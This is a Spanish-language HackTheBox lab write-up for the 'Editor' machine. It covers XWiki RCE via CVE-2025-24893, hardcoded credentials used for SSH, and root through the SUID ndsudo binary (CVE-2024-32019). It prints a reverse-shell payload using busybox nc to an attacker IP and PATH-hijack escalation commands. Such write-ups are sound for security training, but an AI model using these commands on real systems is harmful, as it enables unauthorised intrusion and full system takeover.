Inicializando interfaz segura...0%
mem: 0x0000pid: 1000
SYSTEM ONLINE

v2.0.4 // SECURE

~ / ops / editor.es.md

Editor

17 de febrero de 2025 | HackTheBox | easy
#linux #xwiki #cve-2025-24893 #suid #cve-2024-32019 #rce #credentials-exposure
Portada de Editor

Detalles

  • SO: Linux
  • Dificultad: Fácil
  • Dirección IP: 10.10.11.80
  • Autor: AETH3RON

Resumen

Editor es una máquina Linux de dificultad fácil que expone servicios vulnerables que conducen a la ejecución remota de código. El acceso inicial se obtiene identificando una versión vulnerable de XWiki afectada por CVE-2025-24893, que permite RCE. Tras obtener acceso, descubrimos credenciales expuestas que pueden usarse para establecer una conexión SSH. La escalada de privilegios se logra mediante el abuso de un binario SUID, otorgando finalmente acceso root completo.

Enumeración

Nmap

nmap -Pn -sS -sV -p- 10.10.11.80 -oN nmap-basic
Escaneo Nmap Básico
nmap -Pn -sS -sV -sC -p22,80,8080 10.10.11.80 -oN nmap-common
Escaneo Nmap Común

Del escaneo de puertos, observamos tres puertos abiertos. El puerto 22 ejecuta SSH, el puerto 80 ejecuta nginx y el puerto 8080 aloja un servidor web Jetty.

Al navegar el servicio en el puerto 8080, identificamos una instancia de XWiki desactualizada que expone su versión:

Versión de XWiki Expuesta

Acceso Inicial

Al analizar la instancia de XWiki 15.10.8, identificamos que la aplicación es vulnerable a CVE-2025-24893.

Esta vulnerabilidad se debe al manejo inseguro de expresiones Groovy dentro del macro SolrSearch. Un atacante puede inyectar código Groovy a través de una petición GET manipulada, lo que lleva a la ejecución remota de código.

Podemos activar el exploit usando el siguiente comando:

python3 CVE-2025-24893.py -t 'http://10.10.XX.XX:8080' -c 'busybox nc 10.10.XX.XX 9001 -e /bin/bash'
Ejecución del Exploit

Unos segundos después, recibimos una conexión entrante en nuestro listener de Netcat, confirmando la ejecución remota de código.

Confirmación de RCE

Movimiento Lateral

Una vez dentro de la máquina, enumeramos el sistema de archivos y descubrimos un archivo de configuración interesante llamado hibernate.cfg.xml.

Al inspeccionar su contenido, extraemos una contraseña hardcodeada que parece corresponder al usuario oliver, según las entradas encontradas en /etc/passwd.

Credenciales Expuestas

Con credenciales válidas, ahora podemos iniciar sesión en el sistema vía SSH como Oliver.

Acceso SSH como Oliver

Escalada de Privilegios

Al enumerar binarios SUID en el sistema, identificamos el binario ndsudo, que pertenece a root y tiene el bit SUID activado:

find / -user root -perm -4000 -print 2>/dev/null

Entre los resultados, destaca la siguiente entrada: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

Enumeración de Binarios SUID

Tras investigar el binario, descubrimos que ndsudo es vulnerable a CVE-2024-32019, que permite la escalada local de privilegios debido a una validación de entrada incorrecta y un manejo inseguro de operaciones privilegiadas.

Esta vulnerabilidad puede explotarse para ejecutar comandos arbitrarios como root, otorgando finalmente el compromiso total del sistema. Para explotar este fallo, descargamos una prueba de concepto funcional y la compilamos:

gcc poc.c -o nvme

Luego transferimos el binario compilado a la máquina objetivo y lo ejecutamos:

scp nvme oliver@10.10.11.80:/tmp/
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Tras la ejecución, obtenemos exitosamente una shell root y completamos la escalada de privilegios.

Acceso Root

Impacto de Negocio

En un entorno corporativo, esta cadena de ataque ilustra el riesgo de ejecutar aplicaciones web sin parchear con CVEs conocidos. La explotación de XWiki para RCE inicial, combinada con credenciales hardcodeadas en archivos de configuración y un binario SUID vulnerable a CVE-2024-32019, representa una ruta de compromiso completa desde acceso externo no autenticado hasta control root total. Las organizaciones que dependen de plataformas colaborativas como XWiki para documentación interna enfrentan un riesgo significativo de exfiltración de datos, ya que estos sistemas suelen contener procedimientos operativos sensibles, credenciales y propiedad intelectual.

Referencias